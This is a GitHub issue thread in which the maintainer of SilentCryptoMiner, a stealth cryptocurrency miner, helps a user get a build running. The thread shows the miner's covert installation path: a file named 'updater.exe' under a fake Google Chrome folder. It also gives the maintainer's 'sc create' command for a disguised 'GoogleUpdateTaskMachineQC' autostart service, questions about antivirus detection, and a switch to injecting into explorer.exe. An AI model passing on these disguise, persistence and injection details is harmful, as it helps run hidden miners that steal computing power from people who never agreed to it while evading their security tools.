### ISSUE TITLE
miner not starting?

### ISSUE THREAD

**Issue by vyrlw** [UnamSanctam/SilentCryptoMiner#1937]
i have built the miner with your examplesettings_lite and started it to test on my pc, but when i used the checker, it doesnt come up? do you think there are any problems with it? thank you in advance

**Comment by UnamSanctam** [comment]
No that should work fine, can you post a screenshot of the checker? Also make sure to run the checker that belongs to the specific miner you built in case you have built multiple different ones.

**Comment by vyrlw** [comment]
https://imgur.com/a/sxrRghP

**Comment by UnamSanctam** [comment]
Hmm, and you're sure that you've run the miner and that your antivirus didn't alert anything? Can you check the `%ProgramData%\Google\Chrome\` folder to see if the miner installed there?

**Comment by vyrlw** [comment]
there is a single file called updater there

**Comment by UnamSanctam** [comment]
Alright so the miner did install the file correctly, can you check your "Services" to see if the service called "GoogleUpdateTaskMachineQC" there? And can you check your antivirus detection history to see if anything is there?

**Comment by vyrlw** [comment]
there is none and i also also none in my AV detection

**Comment by vyrlw** [comment]
i suspect it might be because i have a modified version of windows, maybe i should change it so that it injects to explorer?

**Comment by UnamSanctam** [comment]
Yes maybe, what kind of modified Windows? It could be that there's something "weird" about your services. What happens if you run this in an administrator CMD? 
```
sc create "GoogleUpdateTaskMachineQC" binpath= "C:\ProgramData\Google\Chrome\updater.exe" start= "auto"
```

**Comment by vyrlw** [comment]
but when i start the service it gives an error about starting in an untimely fashion

**Comment by UnamSanctam** [comment]
>okay i ran it and its there, also the windows im running is a lite version of w11

Hmm alright strange, that command I sent is the same one that the miner should run, so it's weird that it seems like it didn't. Do you have a virtual machine or anything that you can test it in?

>but when i start the service it gives an error about starting in an untimely fashion

Yes that's normal, it's because the miner is not actually a service (they are specially designed programs), the miner just uses the service system to be able to startup during boot.

**Comment by vyrlw** [comment]
i dont have any virtual machine app, sorry

**Comment by vyrlw** [comment]
hmm, i injected into explorer and finally it shows up on explorer, but thank you for your time !
